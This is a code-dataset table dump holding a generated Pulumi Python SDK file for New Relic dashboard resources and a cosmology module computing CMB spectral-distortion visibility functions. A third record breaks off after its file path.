hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
db9d7715ef314df339a8867add7ea7746ef5a183
| 22,687
|
py
|
Python
|
sdk/python/pulumi_newrelic/one_dashboard_raw.py
|
pulumi/pulumi-newrelic
|
cd9a882f3524883ed155f87ff26c4c17cd048c9a
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-09-17T20:41:26.000Z
|
2022-01-13T23:54:14.000Z
|
sdk/python/pulumi_newrelic/one_dashboard_raw.py
|
pulumi/pulumi-newrelic
|
cd9a882f3524883ed155f87ff26c4c17cd048c9a
|
[
"ECL-2.0",
"Apache-2.0"
] | 136
|
2019-04-29T21:34:57.000Z
|
2022-03-30T17:07:03.000Z
|
sdk/python/pulumi_newrelic/one_dashboard_raw.py
|
pulumi/pulumi-newrelic
|
cd9a882f3524883ed155f87ff26c4c17cd048c9a
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2019-10-05T10:33:59.000Z
|
2021-06-15T16:37:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OneDashboardRawArgs', 'OneDashboardRaw']
@pulumi.input_type
class OneDashboardRawArgs:
def __init__(__self__, *,
pages: pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]],
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OneDashboardRaw resource.
:param pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
pulumi.set(__self__, "pages", pages)
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if permissions is not None:
pulumi.set(__self__, "permissions", permissions)
@property
@pulumi.getter
def pages(self) -> pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]:
"""
A nested block that describes a page. See Nested page blocks below for details.
"""
return pulumi.get(self, "pages")
@pages.setter
def pages(self, value: pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]):
pulumi.set(self, "pages", value)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[int]]:
"""
Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Brief text describing the dashboard.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The title of the dashboard.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def permissions(self) -> Optional[pulumi.Input[str]]:
"""
Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permissions", value)
@pulumi.input_type
class _OneDashboardRawState:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
guid: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]] = None,
permalink: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OneDashboardRaw resources.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] guid: The unique entity identifier of the dashboard page in New Relic.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[str] permalink: The URL for viewing the dashboard.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if description is not None:
pulumi.set(__self__, "description", description)
if guid is not None:
pulumi.set(__self__, "guid", guid)
if name is not None:
pulumi.set(__self__, "name", name)
if pages is not None:
pulumi.set(__self__, "pages", pages)
if permalink is not None:
pulumi.set(__self__, "permalink", permalink)
if permissions is not None:
pulumi.set(__self__, "permissions", permissions)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[int]]:
"""
Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Brief text describing the dashboard.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def guid(self) -> Optional[pulumi.Input[str]]:
"""
The unique entity identifier of the dashboard page in New Relic.
"""
return pulumi.get(self, "guid")
@guid.setter
def guid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "guid", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The title of the dashboard.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def pages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]]:
"""
A nested block that describes a page. See Nested page blocks below for details.
"""
return pulumi.get(self, "pages")
@pages.setter
def pages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]]):
pulumi.set(self, "pages", value)
@property
@pulumi.getter
def permalink(self) -> Optional[pulumi.Input[str]]:
"""
The URL for viewing the dashboard.
"""
return pulumi.get(self, "permalink")
@permalink.setter
def permalink(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permalink", value)
@property
@pulumi.getter
def permissions(self) -> Optional[pulumi.Input[str]]:
"""
Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permissions", value)
class OneDashboardRaw(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]]] = None,
permissions: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Example Usage
### Create A New Relic One Dashboard With RawConfiguration
```python
import pulumi
import json
import pulumi_newrelic as newrelic
exampledash = newrelic.OneDashboardRaw("exampledash", pages=[newrelic.OneDashboardRawPageArgs(
name="Page Name",
widgets=[
newrelic.OneDashboardRawPageWidgetArgs(
title="Custom widget",
row=1,
column=1,
width=1,
height=1,
visualization_id="viz.custom",
configuration=\"\"\" {
"legend": {
"enabled": false
},
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(loadAverageOneMinute), average(loadAverageFiveMinute), average(loadAverageFifteenMinute) from SystemSample SINCE 60 minutes ago TIMESERIES"
}
],
"yAxisLeft": {
"max": 100,
"min": 50,
"zero": false
}
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Server CPU",
row=1,
column=2,
width=1,
height=1,
visualization_id="viz.testing",
configuration=\"\"\" {
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400"
}
]
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Docker Server CPU",
row=1,
column=3,
height=1,
width=1,
visualization_id="viz.bar",
configuration=json.dumps({
"facet": {
"showOtherSeries": False,
},
"nrqlQueries": [{
"accountId": local["accountID"],
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400",
}],
}),
linked_entity_guids=["MzI5ODAxNnxWSVp8REFTSEJPQVJEfDI2MTcxNDc"],
),
],
)])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OneDashboardRawArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
### Create A New Relic One Dashboard With RawConfiguration
```python
import pulumi
import json
import pulumi_newrelic as newrelic
exampledash = newrelic.OneDashboardRaw("exampledash", pages=[newrelic.OneDashboardRawPageArgs(
name="Page Name",
widgets=[
newrelic.OneDashboardRawPageWidgetArgs(
title="Custom widget",
row=1,
column=1,
width=1,
height=1,
visualization_id="viz.custom",
configuration=\"\"\" {
"legend": {
"enabled": false
},
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(loadAverageOneMinute), average(loadAverageFiveMinute), average(loadAverageFifteenMinute) from SystemSample SINCE 60 minutes ago TIMESERIES"
}
],
"yAxisLeft": {
"max": 100,
"min": 50,
"zero": false
}
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Server CPU",
row=1,
column=2,
width=1,
height=1,
visualization_id="viz.testing",
configuration=\"\"\" {
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400"
}
]
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Docker Server CPU",
row=1,
column=3,
height=1,
width=1,
visualization_id="viz.bar",
configuration=json.dumps({
"facet": {
"showOtherSeries": False,
},
"nrqlQueries": [{
"accountId": local["accountID"],
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400",
}],
}),
linked_entity_guids=["MzI5ODAxNnxWSVp8REFTSEJPQVJEfDI2MTcxNDc"],
),
],
)])
```
:param str resource_name: The name of the resource.
:param OneDashboardRawArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OneDashboardRawArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]]] = None,
permissions: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OneDashboardRawArgs.__new__(OneDashboardRawArgs)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if pages is None and not opts.urn:
raise TypeError("Missing required property 'pages'")
__props__.__dict__["pages"] = pages
__props__.__dict__["permissions"] = permissions
__props__.__dict__["guid"] = None
__props__.__dict__["permalink"] = None
super(OneDashboardRaw, __self__).__init__(
'newrelic:index/oneDashboardRaw:OneDashboardRaw',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
guid: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]]] = None,
permalink: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[str]] = None) -> 'OneDashboardRaw':
"""
Get an existing OneDashboardRaw resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] guid: The unique entity identifier of the dashboard page in New Relic.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[str] permalink: The URL for viewing the dashboard.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OneDashboardRawState.__new__(_OneDashboardRawState)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["description"] = description
__props__.__dict__["guid"] = guid
__props__.__dict__["name"] = name
__props__.__dict__["pages"] = pages
__props__.__dict__["permalink"] = permalink
__props__.__dict__["permissions"] = permissions
return OneDashboardRaw(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Output[int]:
"""
Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
"""
return pulumi.get(self, "account_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Brief text describing the dashboard.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def guid(self) -> pulumi.Output[str]:
"""
The unique entity identifier of the dashboard page in New Relic.
"""
return pulumi.get(self, "guid")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The title of the dashboard.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def pages(self) -> pulumi.Output[Sequence['outputs.OneDashboardRawPage']]:
"""
A nested block that describes a page. See Nested page blocks below for details.
"""
return pulumi.get(self, "pages")
@property
@pulumi.getter
def permalink(self) -> pulumi.Output[str]:
"""
The URL for viewing the dashboard.
"""
return pulumi.get(self, "permalink")
@property
@pulumi.getter
def permissions(self) -> pulumi.Output[Optional[str]]:
"""
Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
return pulumi.get(self, "permissions")
| 41.935305
| 201
| 0.5869
| 2,297
| 22,687
| 5.626469
| 0.101872
| 0.080006
| 0.057413
| 0.059579
| 0.840761
| 0.824513
| 0.789307
| 0.778087
| 0.774141
| 0.763541
| 0
| 0.003908
| 0.311985
| 22,687
| 540
| 202
| 42.012963
| 0.824076
| 0.430996
| 0
| 0.690377
| 1
| 0
| 0.090859
| 0.02562
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158996
| false
| 0.004184
| 0.029289
| 0
| 0.284519
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbb52b980ba9d32d4d1219e0aa8f1525bc4603bc
| 6,042
|
py
|
Python
|
specdist/specdist_functions.py
|
borisbolliet/pi_spec
|
88c96f86253b4e719fe31642f3d779e1f4ae576b
|
[
"MIT"
] | 1
|
2021-11-03T16:11:37.000Z
|
2021-11-03T16:11:37.000Z
|
specdist/specdist_functions.py
|
borisbolliet/specdist
|
88c96f86253b4e719fe31642f3d779e1f4ae576b
|
[
"MIT"
] | null | null | null |
specdist/specdist_functions.py
|
borisbolliet/specdist
|
88c96f86253b4e719fe31642f3d779e1f4ae576b
|
[
"MIT"
] | null | null | null |
from .utils import *
from .cosmology import *
def redshift_z_mu(cosmo):
#see eq. 4.47 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#this assumes N_eff = 3.046
#this is only the double compton thermalization redshift
#return 1.98e6*(cosmo.omega_b/0.022)**-(2./5.)*((1.-cosmo.Yp/2.)/0.88)**-(2./5.)*(cosmo.T_cmb/2.725)**(1./5.)
return 1.98e6
def visibility_J_bb(z,cosmo):
#eq. 4.46 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#this is assuming DC only
#z = np.asarray(z)
try:
result = np.exp(-(z/redshift_z_mu(cosmo))**(5./2.))
except:
result = 0.
if math.isnan(result):
result = 0.
return result
def visibility_J_bb_star(z,cosmo):
#see eq. 13 of https://arxiv.org/pdf/1506.06582.pdf
try:
result = 0.983*visibility_J_bb(z,cosmo)*(1.-0.0381*(z/redshift_z_mu(cosmo))**2.29)
except:
result = 0.
if math.isnan(result):
result = 0.
return result
def visibility_J_y(z,cosmo):
#see eq. 5 of https://arxiv.org/pdf/1304.6120.pdf
#z = np.asarray(z)
result = (1.+((1.+z)/6e4)**2.58)**-1.
if math.isnan(result):
result = 0.
return result
def visibility_J_mu(z,cosmo):
#see eq. 5 of https://arxiv.org/pdf/1304.6120.pdf
try:
result = 1.-np.exp(-((1.+z)/5.8e4)**1.88)
except:
result = 0.
if math.isnan(result):
result = 0.
return result
def visibility_J_T(z,cosmo):
#see eq. 5 of https://arxiv.org/pdf/1304.6120.pdf
result = 1.-visibility_J_bb_star(z,cosmo)
if math.isnan(result):
result = 0.
return result
def critical_frequency_x_c_br(z):
#eq. 4.39 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#assumes Itoh et al BR treatment
return 1.23e-3*((1.+z)/2e6)**-0.672
def critical_frequency_x_c_dc(z):
#eq. 4.38 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#assumes DC Gaunt factors are negligible
return 8.60e-3*((1.+z)/2e6)**0.5
def critical_frequency_x_c(z):
return np.sqrt(critical_frequency_x_c_br(z)**2.+critical_frequency_x_c_dc(z)**2.)
def mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
def integrand(ln1pz,*args):
z = np.exp(ln1pz)-1.
J_bb = visibility_J_bb(z,args[0])
J_mu = visibility_J_mu(z,args[0])
dt_dln1pz = -1./cosmo.E(z)/args[0].H0()
dlnrho_dln1pz = energy_release_history_dlnrho_dt(z,args[0],**args[1])*dt_dln1pz
result = 3./kappa_c*J_bb*J_mu*dlnrho_dln1pz
return result
#trapezoidal rule
nz = int(50)
ln1pz_array = np.linspace((np.log(1.+cosmo.z_start)),(np.log(1.+cosmo.z_end)),nz)
Ip = []
int_array_xp = []
a_args = (cosmo,kwargs)
for p in ln1pz_array:
int_p = integrand(p,*a_args)
int_array_xp.append(int_p)
int_array_xp=np.asarray(int_array_xp)
Ip = np.trapz(int_array_xp,ln1pz_array)
result = (Ip,0.)
####end trapezoidal rule
#result = quad(integrand,np.log(1.+cosmo.z_start),np.log(1.+cosmo.z_end), args=(cosmo,kwargs))
r_dict = {}
r_dict['value']=result[0]
r_dict['err'] = result[1]
return r_dict
def y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
def integrand(ln1pz,*args):
z = np.exp(ln1pz)-1.
J_bb = visibility_J_bb(z,args[0])
J_y = visibility_J_y(z,args[0])
dt_dln1pz = -1./cosmo.E(z)/args[0].H0()
dlnrho_dln1pz = energy_release_history_dlnrho_dt(z,args[0],**args[1])*dt_dln1pz
result = J_bb*J_y*dlnrho_dln1pz/4.
return result
#trapezoidal rule
nz = int(50)
ln1pz_array = np.linspace((np.log(1.+cosmo.z_start)),(np.log(1.+cosmo.z_end)),nz)
Ip = []
int_array_xp = []
a_args = (cosmo,kwargs)
for p in ln1pz_array:
int_p = integrand(p,*a_args)
int_array_xp.append(int_p)
int_array_xp=np.asarray(int_array_xp)
Ip = np.trapz(int_array_xp,ln1pz_array)
result = (Ip,0.)
####end trapezoidal rule
#result = quad(integrand,np.log(1.+cosmo.z_start),np.log(1.+cosmo.z_end), args=(cosmo,kwargs))
r_dict = {}
r_dict['value']=result[0]
r_dict['err'] = result[1]
return r_dict
def Drho_rho_y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
return y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)['value']*4.
def Drho_rho_mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
return mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)['value']/(3./kappa_c)
def Drho_rho_tot_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
return Drho_rho_y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)+Drho_rho_mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)
def DN_N_from_entropy_production_history(entropy_production_history_dlnN_dt,cosmo,**kwargs):
def integrand(ln1pz,*args):
z = np.exp(ln1pz)-1.
# J_bb = visibility_J_bb(z,args[0])
# J_y = visibility_J_y(z,args[0])
dt_dln1pz = -1./cosmo.E(z)/args[0].H0()
dlnN_dln1pz = entropy_production_history_dlnN_dt(z,args[0],**args[1])*dt_dln1pz
result = dlnN_dln1pz
return result
#trapezoidal rule
nz = int(50)
ln1pz_array = np.linspace((np.log(1.+cosmo.z_start)),(np.log(1.+cosmo.z_end)),nz)
Ip = []
int_array_xp = []
a_args = (cosmo,kwargs)
for p in ln1pz_array:
int_p = integrand(p,*a_args)
int_array_xp.append(int_p)
int_array_xp=np.asarray(int_array_xp)
Ip = np.trapz(int_array_xp,ln1pz_array)
result = (Ip,0.)
####end trapezoidal rule
#result = quad(integrand,np.log(1.+cosmo.z_start),np.log(1.+cosmo.z_end), args=(cosmo,kwargs))
r_dict = {}
r_dict['value']=result[0]
r_dict['err'] = result[1]
return r_dict
| 35.964286
| 187
| 0.667825
| 998
| 6,042
| 3.776553
| 0.144289
| 0.068984
| 0.106129
| 0.035023
| 0.850093
| 0.801008
| 0.768374
| 0.768374
| 0.768374
| 0.750862
| 0
| 0.048756
| 0.181893
| 6,042
| 167
| 188
| 36.179641
| 0.713737
| 0.217643
| 0
| 0.708333
| 0
| 0
| 0.007248
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.016667
| 0.058333
| 0.316667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9171b2fc399f821fc1417f6dc4dc653c5c0c1b5e
| 986
|
py
|
Python
|
tests/test_eolterm.py
|
bitranox/Arpeggio
|
62151cb8ef2cfe5113a4388da09892e7714c5e96
|
[
"MIT"
] | null | null | null |
tests/test_eolterm.py
|
bitranox/Arpeggio
|
